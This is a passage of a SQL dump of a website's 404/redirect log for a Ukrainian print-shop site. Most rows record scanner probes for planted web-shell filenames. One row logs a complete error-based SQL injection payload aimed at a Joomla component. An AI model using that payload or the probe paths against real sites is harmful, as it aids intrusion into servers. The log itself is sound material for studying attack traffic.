00:00:00',301),(3165,'http://ekvatorprint.com.ua/includes/utf.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 05:23:28','0000-00-00 00:00:00',301),(3166,'http://ekvatorprint.com.ua/libraries/themes.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 05:23:43','0000-00-00 00:00:00',301),(3167,'http://ekvatorprint.com.ua/media/header.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 05:24:57','0000-00-00 00:00:00',301),(3168,'http://ekvatorprint.com.ua/administrator/view.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 05:25:46','0000-00-00 00:00:00',301),(3169,'http://ekvatorprint.com.ua/modules/blog.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 05:26:04','0000-00-00 00:00:00',301),(3170,'http://ekvatorprint.com.ua/images/db.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 05:26:07','0000-00-00 00:00:00',301),(3171,'http://ekvatorprint.com.ua/templates/dir.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 05:27:09','0000-00-00 00:00:00',301),(3172,'http://ekvatorprint.com.ua/administrator/object.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 05:27:49','0000-00-00 00:00:00',301),(3173,'http://ekvatorprint.com.ua/components/blog.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 05:27:53','0000-00-00 00:00:00',301),(3174,'http://ekvatorprint.com.ua/libraries/functions.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 05:28:34','0000-00-00 00:00:00',301),(3175,'http://ekvatorprint.com.ua/modules/footer.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 05:28:40','0000-00-00 00:00:00',301),(3176,'http://ekvatorprint.com.ua/components/dirs.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 05:29:31','0000-00-00 00:00:00',301),(3177,'http://ekvatorprint.com.ua/media/global.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 05:29:49','0000-00-00 00:00:00',301),(3178,'http://ekvatorprint.com.ua/media/themes.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 05:30:03','0000-00-00 00:00:00',301),(3179,'http://ekvatorprint.com.ua/libraries/config.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 05:30:18','0000-00-00 00:00:00',301),(3180,'http://ekvatorprint.com.ua/plugins/menu.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 05:30:54','0000-00-00 00:00:00',301),(3181,'http://ekvatorprint.com.ua/includes/press.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 05:31:08','0000-00-00 00:00:00',301),(3182,'http://ekvatorprint.com.ua/administrator/session.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 05:31:25','0000-00-00 00:00:00',301),(3183,'http://ekvatorprint.com.ua/plugins/files.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 05:31:25','0000-00-00 00:00:00',301),(3184,'http://ekvatorprint.com.ua/libraries/login.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 05:31:47','0000-00-00 00:00:00',301),(3185,'http://ekvatorprint.com.ua/images/error.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 05:31:55','0000-00-00 00:00:00',301),(3186,'http://ekvatorprint.com.ua/modules/defines.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 05:31:57','0000-00-00 00:00:00',301),(3187,'http://ekvatorprint.com.ua/includes/global.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 05:32:03','0000-00-00 00:00:00',301),(3188,'http://ekvatorprint.com.ua/includes/dump.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 05:32:07','0000-00-00 00:00:00',301),(3189,'http://ekvatorprint.com.ua/plugins/help.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 05:32:11','0000-00-00 00:00:00',301),(3190,'http://ekvatorprint.com.ua/media/code.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 05:32:27','0000-00-00 00:00:00',301),(3191,'http://ekvatorprint.com.ua/templates/stats.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 05:34:23','0000-00-00 00:00:00',301),(3192,'http://ekvatorprint.com.ua/templates/dump.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 05:36:19','0000-00-00 00:00:00',301),(3193,'http://ekvatorprint.com.ua/components/option.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 05:37:00','0000-00-00 00:00:00',301),(3194,'http://ekvatorprint.com.ua/images/dump.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 05:37:01','0000-00-00 00:00:00',301),(3195,'http://ekvatorprint.com.ua/components/cache.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 05:37:31','0000-00-00 00:00:00',301),(3196,'http://ekvatorprint.com.ua/libraries/model.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 05:38:37','0000-00-00 00:00:00',301),(3197,'http://ekvatorprint.com.ua/images/info.php',NULL,'ekvatorprint.com.ua','',2,0,'2016-12-29 05:39:04','0000-00-00 00:00:00',301),(3198,'http://ekvatorprint.com.ua/components/dump.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 05:39:18','0000-00-00 00:00:00',301),(3199,'http://ekvatorprint.com.ua/administrator/code.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 05:39:48','0000-00-00 00:00:00',301),(3200,'http://ekvatorprint.com.ua/libraries/error.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 05:40:07','0000-00-00 00:00:00',301),(3201,'http://ekvatorprint.com.ua/libraries/code.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 05:41:45','0000-00-00 00:00:00',301),(3202,'http://ekvatorprint.com.ua/libraries/user.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 05:44:31','0000-00-00 00:00:00',301),(3203,'http://ekvatorprint.com.ua/modules/plugin.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 05:45:45','0000-00-00 00:00:00',301),(3204,'http://ekvatorprint.com.ua/includes/css.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 05:46:35','0000-00-00 00:00:00',301),(3205,'http://ekvatorprint.com.ua/media/dump.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 05:46:41','0000-00-00 00:00:00',301),(3206,'http://ekvatorprint.com.ua/plugins/lib.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 05:47:42','0000-00-00 00:00:00',301),(3207,'http://ekvatorprint.com.ua/plugins/options.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 05:47:46','0000-00-00 00:00:00',301),(3208,'http://ekvatorprint.com.ua/images/cache.php',NULL,'ekvatorprint.com.ua','',6,0,'2016-12-29 05:49:40','0000-00-00 00:00:00',301),(3209,'http://ekvatorprint.com.ua/administrator/alias.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 05:52:36','0000-00-00 00:00:00',301),(3210,'http://ekvatorprint.com.ua/media/db.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 05:53:28','0000-00-00 00:00:00',301),(3211,'http://ekvatorprint.com.ua/components/alias.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 05:58:13','0000-00-00 00:00:00',301),(3212,'http://ekvatorprint.com.ua/templates/help.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 06:01:33','0000-00-00 00:00:00',301),(3213,'http://ekvatorprint.com.ua/plugins/plugin.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 06:03:47','0000-00-00 00:00:00',301),(3214,'http://ekvatorprint.com.ua/components/press.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 06:07:41','0000-00-00 00:00:00',301),(3215,'http://ekvatorprint.com.ua/images/code.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 06:08:49','0000-00-00 00:00:00',301),(3216,'http://ekvatorprint.com.ua/plugins/press.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 06:09:34','0000-00-00 00:00:00',301),(3217,'http://ekvatorprint.com.ua/administrator/help.php',NULL,'ekvatorprint.com.ua','',2,0,'2016-12-29 06:11:51','0000-00-00 00:00:00',301),(3218,'http://ekvatorprint.com.ua/administrator/cache.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 06:12:16','0000-00-00 00:00:00',301),(3219,'http://ekvatorprint.com.ua/templates/plugin.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 06:14:01','0000-00-00 00:00:00',301),(3220,'http://ekvatorprint.com.ua/media/user.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 06:15:11','0000-00-00 00:00:00',301),(3221,'http://ekvatorprint.com.ua/modules/search.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 06:16:48','0000-00-00 00:00:00',301),(3222,'http://ekvatorprint.com.ua/images/list.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 06:17:51','0000-00-00 00:00:00',301),(3223,'http://ekvatorprint.com.ua/modules/dump.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 06:20:17','0000-00-00 00:00:00',301),(3224,'http://ekvatorprint.com.ua/components/global.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 06:21:49','0000-00-00 00:00:00',301),(3225,'http://ekvatorprint.com.ua/components/help.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 06:26:47','0000-00-00 00:00:00',301),(3226,'http://ekvatorprint.com.ua/templates/lib.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 06:28:35','0000-00-00 00:00:00',301),(3227,'http://ekvatorprint.com.ua/templates/view.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 06:28:48','0000-00-00 00:00:00',301),(3228,'http://ekvatorprint.com.ua/images/themes.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 06:29:41','0000-00-00 00:00:00',301),(3229,'http://ekvatorprint.com.ua/includes/view.php',NULL,'ekvatorprint.com.ua','',2,0,'2016-12-29 06:30:03','0000-00-00 00:00:00',301),(3230,'http://ekvatorprint.com.ua/media/info.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 06:30:13','0000-00-00 00:00:00',301),(3231,'http://ekvatorprint.com.ua/media/search.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 06:34:39','0000-00-00 00:00:00',301),(3232,'http://ekvatorprint.com.ua/administrator/dump.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 06:35:47','0000-00-00 00:00:00',301),(3233,'http://ekvatorprint.com.ua/plugins/list.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 06:35:49','0000-00-00 00:00:00',301),(3234,'http://ekvatorprint.com.ua/templates/themes.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 06:39:57','0000-00-00 00:00:00',301),(3235,'http://ekvatorprint.com.ua/libraries/stats.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 06:39:57','0000-00-00 00:00:00',301),(3236,'http://ekvatorprint.com.ua/libraries/page.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 06:40:36','0000-00-00 00:00:00',301),(3237,'http://ekvatorprint.com.ua/plugins/alias.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 06:42:02','0000-00-00 00:00:00',301),(3238,'http://ekvatorprint.com.ua/includes/page.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 06:43:00','0000-00-00 00:00:00',301),(3239,'http://ekvatorprint.com.ua/administrator/option.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 06:43:12','0000-00-00 00:00:00',301),(3240,'http://ekvatorprint.com.ua/libraries/info.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 06:43:24','0000-00-00 00:00:00',301),(3241,'http://ekvatorprint.com.ua/modules/user.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 06:47:27','0000-00-00 00:00:00',301),(3242,'http://ekvatorprint.com.ua/templates/options.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 06:48:58','0000-00-00 00:00:00',301),(3243,'http://ekvatorprint.com.ua/administrator/javascript.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 06:51:02','0000-00-00 00:00:00',301),(3244,'http://ekvatorprint.com.ua/includes/lib.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 06:51:10','0000-00-00 00:00:00',301),(3245,'http://ekvatorprint.com.ua/includes/plugin.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 06:54:16','0000-00-00 00:00:00',301),(3246,'http://ekvatorprint.com.ua/templates/page.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 06:55:09','0000-00-00 00:00:00',301),(3247,'http://ekvatorprint.com.ua/administrator/page.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 06:55:20','0000-00-00 00:00:00',301),(3248,'http://ekvatorprint.com.ua/media/plugin.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 06:57:31','0000-00-00 00:00:00',301),(3249,'http://ekvatorprint.com.ua/includes/error.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 06:57:35','0000-00-00 00:00:00',301),(3250,'http://ekvatorprint.com.ua/libraries/db.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 06:57:45','0000-00-00 00:00:00',301),(3251,'http://ekvatorprint.com.ua/modules/global.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 06:57:52','0000-00-00 00:00:00',301),(3252,'http://ekvatorprint.com.ua/templates/cache.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 06:59:36','0000-00-00 00:00:00',301),(3253,'http://ekvatorprint.com.ua/plugins/info.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 07:00:53','0000-00-00 00:00:00',301),(3254,'http://ekvatorprint.com.ua/templates/code.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 07:01:09','0000-00-00 00:00:00',301),(3255,'http://ekvatorprint.com.ua/media/page.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 07:02:26','0000-00-00 00:00:00',301),(3256,'http://ekvatorprint.com.ua/modules/model.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 07:02:51','0000-00-00 00:00:00',301),(3257,'http://ekvatorprint.com.ua/media/css.php',NULL,'ekvatorprint.com.ua','',2,0,'2016-12-29 07:08:07','0000-00-00 00:00:00',301),(3258,'http://ekvatorprint.com.ua/libraries/list.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 07:09:56','0000-00-00 00:00:00',301),(3259,'http://ekvatorprint.com.ua/templates/press.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 07:10:37','0000-00-00 00:00:00',301),(3260,'http://ekvatorprint.com.ua/includes/stats.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 07:10:44','0000-00-00 00:00:00',301),(3261,'http://ekvatorprint.com.ua/images/help.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 07:12:22','0000-00-00 00:00:00',301),(3262,'http://ekvatorprint.com.ua/includes/model.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 07:13:14','0000-00-00 00:00:00',301),(3263,'http://ekvatorprint.com.ua/components/stats.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 07:17:02','0000-00-00 00:00:00',301),(3264,'http://ekvatorprint.com.ua/components/plugin.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 07:17:05','0000-00-00 00:00:00',301),(3265,'http://ekvatorprint.com.ua/plugins/login.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 07:18:21','0000-00-00 00:00:00',301),(3266,'http://ekvatorprint.com.ua/images/defines.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 07:24:23','0000-00-00 00:00:00',301),(3267,'http://ekvatorprint.com.ua/administrator/model.php',NULL,'ekvatorprint.com.ua','',1,0,'2016-12-29 07:25:30','0000-00-00 00:00:00',301),(3268,'http://ekvatorprint.com.ua/includes/logo_img.php',NULL,'ekvatorprint.com.ua','',20,0,'2016-12-29 19:37:54','0000-00-00 00:00:00',301),(3269,'http://ekvatorprint.com.ua/m/price',NULL,'','',2,0,'2016-12-29 23:52:02','0000-00-00 00:00:00',301),(3270,'http://ekvatorprint.com.ua/wp-includes/registration-functions.php',NULL,'','',4,0,'2016-12-30 02:02:00','0000-00-00 00:00:00',301),(3271,'http://ekvatorprint.com.ua/wp-content/plugins/ubh/up.php',NULL,'','',4,0,'2016-12-30 16:06:49','0000-00-00 00:00:00',301),(3272,'http://ekvatorprint.com.ua/undefineddeviceLocks?isExpiredStatus=true',NULL,'http://ekvatorprint.com.ua/printing-on-canvas','',1,0,'2016-12-30 22:37:10','0000-00-00 00:00:00',301),(3273,'http://ekvatorprint.com.ua/undefinedtimestamp/lastEnter',NULL,'http://ekvatorprint.com.ua/printing-on-canvas','',1,0,'2016-12-30 22:37:16','0000-00-00 00:00:00',301),(3274,'http://ekvatorprint.com.ua/:80/index.php?Itemid=48&lang=\'and(select 1 from(select count(),concat((select concat(CHAR(52),CHAR(67),CHAR(117),CHAR(81),CHAR(54),CHAR(114),CHAR(89),CHAR(102),CHAR(118),CHAR(111),CHAR(100)) from information_schema.tables limit 0,1),floor(rand(0)2))x from information_schema.tables group by x)a)and\'&option=com_sefservicemap',NULL,'http://ekvatorprint.com.ua:80/:80/index.php?Itemid=48&lang=\'and(select%201%20from(select%20count()%2cconcat((select%20concat(CHAR(52)%2cCHAR(67)%2cCHAR(117)%2cCHAR(81)%2cCHAR(54)%2cCHAR(114)%2cCHAR(89)%2cCHAR(102)%2cCHAR(118)%2cCHAR(111)%2cCHAR(100))%20from%20information_schema.tables%20limit%200%2c1)%2cfloor(rand(0)2))x%20from%20information_schema.tables%20group%20by%20x)a)and\'&option=com_sefservicemap','',1,0,'2016-12-31 14:39:41','0000-00-00 00:00:00',301),(3275,'http://ekvatorprint.com.ua/',NULL,'','',1149,0,'2016-12-31 23:16:03','0000-00-00 00:00:00',301),(3276,'http://ekvatorprint.com.ua/udd.php',NULL,'','',2,0,'2017-01-01 21:41:38','0000-00-00 00:00:00',301),(3277,'http://ekvatorprint.com.ua/Доставка по всей Украине - продукции широкоформатной печати - 1-3 дня.',NULL,'http://ekvatorprint.com.ua/delivery','',1,0,'2017-01-02 09:29:32','0000-00-00 00:00:00',301),(3278,'http://ekvatorprint.com.ua/404.php',NULL,'http://ekvatorprint.com.ua/404.php','',4,0,'2017-01-02 20:51:19','0000-00-00 00:00:00',301),(3279,'http://ekvatorprint.com.ua/administrator/cache/crpyvj.php',NULL,'http://ekvatorprint.com.ua/administrator/cache/crpyvj.php','',1,0,'2017-01-02 20:51:19','0000-00-00 00:00:00',301),(3280,'http://ekvatorprint.com.ua/administrator/components/com_contact/controllers/old_c2.php',NULL,'http://ekvatorprint.com.ua/administrator/components/com_contact/controllers/old_c2.php','',1,0,'2017-01-02 20:51:20','0000-00-00 00:00:00',301),(3281,'http://ekvatorprint.com.ua/administrator/components/com_content/views/articles/incluide.php',NULL,'http://ekvatorprint.com.ua/administrator/components/com_content/views/articles/incluide.php','',1,0,'2017-01-02 20:51:20','0000-00-00 00:00:00',301),(3282,'http://ekvatorprint.com.ua/LICESNE.php',NULL,'http://ekvatorprint.com.ua/LICESNE.php','',1,0,'2017-01-02 20:51:20','0000-00-00 00:00:00',301),(3283,'http://ekvatorprint.com.ua/administrator/components/com_content/models/backup.php.suspected',NULL,'http://ekvatorprint.com.ua/administrator/components/com_content/models/backup.php.suspected','',1,0,'2017-01-02 20:51:20','0000-00-00 00:00:00',301),(3284,'http://ekvatorprint.com.ua/administrator/components/com_banners/views/tracks/tmpl/htaccess.php',NULL,'http://ekvatorprint.com.ua/administrator/components/com_banners/views/tracks/tmpl/htaccess.php','',1,0,'2017-01-02 20:51:20','0000-00-00 00:00:00',301),(3285,'http://ekvatorprint.com.ua/administrator/backups/logo_img.php',NULL,'http://ekvatorprint.com.ua/administrator/backups/logo_img.php','',2,0,'2017-01-02 20:51:21','0000-00-00 00:00:00',301),(3286,'http://ekvatorprint.com.ua/administrator/components/com_checkin/models/backup_c2.php',NULL,'http://ekvatorprint.com.ua/administrator/components/com_checkin/models/backup_c2.php','',1,0,'2017-01-02 20:51:21','0000-00-00 00:00:00',301),(3287,'http://ekvatorprint.com.ua/administrator/components/com_content/models/fields/modal/htaccess.php',NULL,'http://ekvatorprint.com.ua/administrator/components/com_content/models/fields/modal/htaccess.php','',1,0,'2017-01-02 20:51:21','0000-00-00 00:00:00',301),(3288,'http://ekvatorprint.com.ua/administrator/images/menu_divider.php',NULL,'http://ekvatorprint.com.ua/administrator/images/menu_divider.php','',1,0,'2017-01-02 20:51:50','0000-00-00 00:00:00',301),(3289,'http://ekvatorprint.com.ua/administrator/components/com_k2/views/categories/tmpl/backup_c2.php',NULL,'http://ekvatorprint.com.ua/administrator/components/com_k2/views/categories/tmpl/backup_c2.php','',1,0,'2017-01-02 20:51:50','0000-00-00 00:00:00',301),(3290,'http://ekvatorprint.com.ua/administrator/components/com_jce/helpers/setup.php',NULL,'http://ekvatorprint.com.ua/administrator/components/com_jce/helpers/setup.php','',1,0,'2017-01-02 20:51:51','0000-00-00 00:00:00',301),(3291,'http://ekvatorprint.com.ua/administrator/includes/index.php',NULL,'http://ekvatorprint.com.ua/administrator/includes/index.php','',1,0,'2017-01-02 20:51:51','0000-00-00 00:00:00',301),(3292,'http://ekvatorprint.com.ua/administrator/components/com_languages/views/installed/incluide.php',NULL,'http://ekvatorprint.com.ua/administrator/components/com_languages/views/installed/incluide.php','',1,0,'2017-01-02 20:51:51','0000-00-00 00:00:00',301),(3293,'http://ekvatorprint.com.ua/administrator/components/com_languages/models/forms/incluide.php',NULL,'http://ekvatorprint.com.ua/administrator/components/com_languages/models/forms/incluide.php','',1,0,'2017-01-02 20:51:51','0000-00-00 00:00:00',301),(3294,'http://ekvatorprint.com.ua/administrator/components/com_languages/views/language/incluide.php',NULL,'http://ekvatorprint.com.ua/administrator/components/com_languages/views/language/incluide.php','',1,0,'2017-01-02 20:51:51','0000-00-00 00:00:00',301),(3295,'http://ekvatorprint.com.ua/administrator/components/com_tags/views/tags/incluide.php',NULL,'http://ekvatorprint.com.ua/administrator/components/com_tags/views/tags/incluide.php','',1,0,'2017-01-02 20:51:51','0000-00-00 00:00:00',301),(3296,'http://ekvatorprint.com.ua/administrator/components/com_installer/views/plugins/tmpl/setup.php',NULL,'http://ekvatorprint.com.ua/administrator/components/com_installer/views/plugins/tmpl/setup.php','',1,0,'2017-01-02 20:51:51','0000-00-00 00:00:00',301),(3297,'http://ekvatorprint.com.ua/administrator/components/com_installer/views/database/tmpl/setup.php',NULL,'http://ekvatorprint.com.ua/administrator/components/com_installer/views/database/tmpl/setup.php','',1,0,'2017-01-02 20:51:52','0000-00-00 00:00:00',301),(3298,'http://ekvatorprint.com.ua/administrator/tmp/system.php',NULL,'http://ekvatorprint.com.ua/administrator/tmp/system.php','',1,0,'2017-01-02 20:52:19','0000-00-00 00:00:00',301),(3299,'http://ekvatorprint.com.ua/ar.php',NULL,'http://ekvatorprint.com.ua/ar.php','',1,0,'2017-01-02 20:52:20','0000-00-00 00:00:00',301),(3300,'http://ekvatorprint.com.ua/administrator/includes/sidebar.php',NULL,'http://ekvatorprint.com.ua/administrator/includes/sidebar.php','',1,0,'2017-01-02 20:52:21','0000-00-00 00:00:00',301),(3301,'http://ekvatorprint.com.ua/components/com_phocagallery/views/category/backup.php',NULL,'http://ekvatorprint.com.ua/components/com_phocagallery/views/category/backup.php','',1,0,'2017-01-02 20:52:44','0000-00-00 00:00:00',301),(3302,'http://ekvatorprint.com.ua/components/com_content/views/archive/tmpl/incluide.php',NULL,'http://ekvatorprint.com.ua/components/com_content/views/archive/tmpl/incluide.php','',1,0,'2017-01-02 20:52:44','0000-00-00 00:00:00',301),(3303,'http://ekvatorprint.com.ua/components/logo_img.php',NULL,'http://ekvatorprint.com.ua/components/logo_img.php','',22,0,'2017-01-02 20:53:13','0000-00-00 00:00:00',301),(3304,'http://ekvatorprint.com.ua/components/com_users/SysManager.php',NULL,'http://ekvatorprint.com.ua/components/com_users/SysManager.php','',1,0,'2017-01-02 20:53:14','0000-00-00 00:00:00',301),(3305,'http://ekvatorprint.com.ua/components/com_users/views/remind/tmpl/incluide.php',NULL,'http://ekvatorprint.com.ua/components/com_users/views/remind/tmpl/incluide.php','',1,0,'2017-01-02 20:53:14','0000-00-00 00:00:00',301),(3306,'http://ekvatorprint.com.ua/components/com_users/com_users.php',NULL,'http://ekvatorprint.com.ua/components/com_users/com_users.php','',1,0,'2017-01-02 20:53:15','0000-00-00 00:00:00',301),(3307,'http://ekvatorprint.com.ua/framework.php',NULL,'http://ekvatorprint.com.ua/framework.php','',6,0,'2017-01-02 20:53:43','0000-00-00 00:00:00',301),(3308,'http://ekvatorprint.com.ua/images/cache_log.php',NULL,'http://ekvatorprint.com.ua/images/cache_log.php','',1,0,'2017-01-02 20:53:43','0000-00-00 00:00:00',301),(3309,'http://ekvatorprint.com.ua/images/smilies/bez.php',NULL,'http://ekvatorprint.com.ua/images/smilies/bez.php','',1,0,'2017-01-02 20:54:09','0000-00-00 00:00:00',301),(3310,'http://ekvatorprint.com.ua/images/wp-bommer.php',NULL,'http://ekvatorprint.com.ua/images/wp-bommer.php','',1,0,'2017-01-02 20:54:10','0000-00-00 00:00:00',301),(3311,'http://ekvatorprint.com.ua/img.php',NULL,'http://ekvatorprint.com.ua/img.php','',1,0,'2017-01-02 20:54:10','0000-00-00 00:00:00',301),(3312,'http://ekvatorprint.com.ua/includes/js/contact.php',NULL,'http://ekvatorprint.com.ua/includes/js/contact.php','',1,0,'2017-01-02 20:54:43','0000-00-00 00:00:00',301),(3313,'http://ekvatorprint.com.ua/includes/joomla.api.php',NULL,'http://ekvatorprint.com.ua/includes/joomla.api.php','',1,0,'2017-01-02 20:54:44','0000-00-00 00:00:00',301),(3314,'http://ekvatorprint.com.ua/includes/ajax.inc.php',NULL,'http://ekvatorprint.com.ua/includes/ajax.inc.php','',1,0,'2017-01-02 20:54:44','0000-00-00 00:00:00',301),(3315,'http://ekvatorprint.com.ua/includes/rsq.php',NULL,'http://ekvatorprint.com.ua/includes/rsq.php','',2,0,'2017-01-02 20:54:44','0000-00-00 00:00:00',301),(3316,'http://ekvatorprint.com.ua/includes/database.cfg.php',NULL,'http://ekvatorprint.com.ua/includes/database.cfg.php','',2,0,'2017-01-02 20:54:44','0000-00-00 00:00:00',301),(3317,'http://ekvatorprint.com.ua/libraries/joomla/cache/controller/xml-link.php',NULL,'http://ekvatorprint.com.ua/libraries/joomla/cache/controller/xml-link.php','',1,0,'2017-01-02 20:55:11','0000-00-00 00:00:00',301),(3318,'http://ekvatorprint.com.ua/language/logo_img.php',NULL,'http://ekvatorprint.com.ua/language/logo_img.php','',9,0,'2017-01-02 20:55:11','0000-00-00 00:00:00',301),(3319,'http://ekvatorprint.com.ua/language/language.php',NULL,'http://ekvatorprint.com.ua/language/language.php','',2,0,'2017-01-02 20:55:13','0000-00-00 00:00:00',301),(3320,'http://ekvatorprint.com.ua/libraries/joomla/access/strangers.php',NULL,'http://ekvatorprint.com.ua/libraries/joomla/access/strangers.php','',3,0,'2017-01-02 20:55:13','0000-00-00 00:00:00',301),(3321,'http://ekvatorprint.com.ua/layouts/libraries/libraries.php',NULL,'http://ekvatorprint.com.ua/layouts/libraries/libraries.php','',1,0,'2017-01-02 20:55:14','0000-00-00 00:00:00',301),(3322,'http://ekvatorprint.com.ua/layouts/logo_img.php',NULL,'http://ekvatorprint.com.ua/layouts/logo_img.php','',12,0,'2017-01-02 20:55:14','0000-00-00 00:00:00',301),(3323,'http://ekvatorprint.com.ua/libraries/logo_img.php',NULL,'http://ekvatorprint.com.ua/libraries/logo_img.php','',14,0,'2017-01-02 20:55:39','0000-00-00 00:00:00',301),(3324,'http://ekvatorprint.com.ua/libraries/simplepie/idn/main.php',NULL,'http://ekvatorprint.com.ua/libraries/simplepie/idn/main.php','',1,0,'2017-01-02 20:55:40','0000-00-00 00:00:00',301),(3325,'http://ekvatorprint.com.ua/media/editors/codemirror/mode/mumps/incluide.php',NULL,'http://ekvatorprint.com.ua/media/editors/codemirror/mode/mumps/incluide.php','',1,0,'2017-01-02 20:55:40','0000-00-00 00:00:00',301),(3326,'http://ekvatorprint.com.ua/mod.php',NULL,'http://ekvatorprint.com.ua/mod.php','',1,0,'2017-01-02 20:56:11','0000-00-00 00:00:00',301),(3327,'http://ekvatorprint.com.ua/modules/mod_404/mod_404.php',NULL,'http://ekvatorprint.com.ua/modules/mod_404/mod_404.php','',1,0,'2017-01-02 20:56:12','0000-00-00 00:00:00',301),(3328,'http://ekvatorprint.com.ua/media/mailto/array_diff_uassoc.php',NULL,'http://ekvatorprint.com.ua/media/mailto/array_diff_uassoc.php','',1,0,'2017-01-02 20:56:12','0000-00-00 00:00:00',301),(3329,'http://ekvatorprint.com.ua/media/logo_img.php',NULL,'http://ekvatorprint.com.ua/media/logo_img.php','',9,0,'2017-01-02 20:56:12','0000-00-00 00:00:00',301),(3330,'http://ekvatorprint.com.ua/modules/logo_img.php',NULL,'http://ekvatorprint.com.ua/modules/logo_img.php','',15,0,'2017-01-02 20:56:12','0000-00-00 